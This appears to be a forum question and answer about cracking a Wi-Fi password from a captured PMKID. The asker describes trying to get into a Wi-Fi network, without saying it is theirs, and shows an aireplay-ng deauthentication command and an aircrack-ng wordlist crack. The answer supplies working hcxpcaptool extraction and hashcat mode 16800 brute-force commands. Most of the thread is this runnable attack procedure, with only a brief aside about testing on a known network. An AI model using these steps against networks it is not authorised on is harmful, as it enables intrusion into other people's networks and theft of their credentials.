# PMKID found , but it should be WPA handshake

Tags: wifi, password-cracking, aircrack-ng

i was trying to get access in wifi network but i came to something that i need to ask after`aireplay-ng –0 20 –a [router bssid] –c [client bssid] wlan0mon` i expect

> WPA handshake

in right top corner in the terminal, but it appears

> PMKID found

can i crack this as same as WPA handshake with `aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap` or what should i do to crack this?

Answer (score 0):

you can certainly try your luck cracking it with hashcat. if you want to test it out, capture a PMKID of a wifi that you know the PSK password for and try bruteforcing with the known password to confirm it works.

install the latest version of hcxtool from github on Linux: https://github.com/ZerBea/hcxtools

then run hxcpcaptool on the pcap file to extract the PMKID like this:

```
hcxpcaptool -z pmkid_hash.txt your-pcap-01.cap
```

now run hashcat (using mode 16800) on the extracted pmkid hash:

```
hashcat -m 16800 pmkid_hash.txt -a 3 -w 3 '?l?l?l?l?l?lt!'
```

ref: https://hashcat.net/forum/thread-7717.html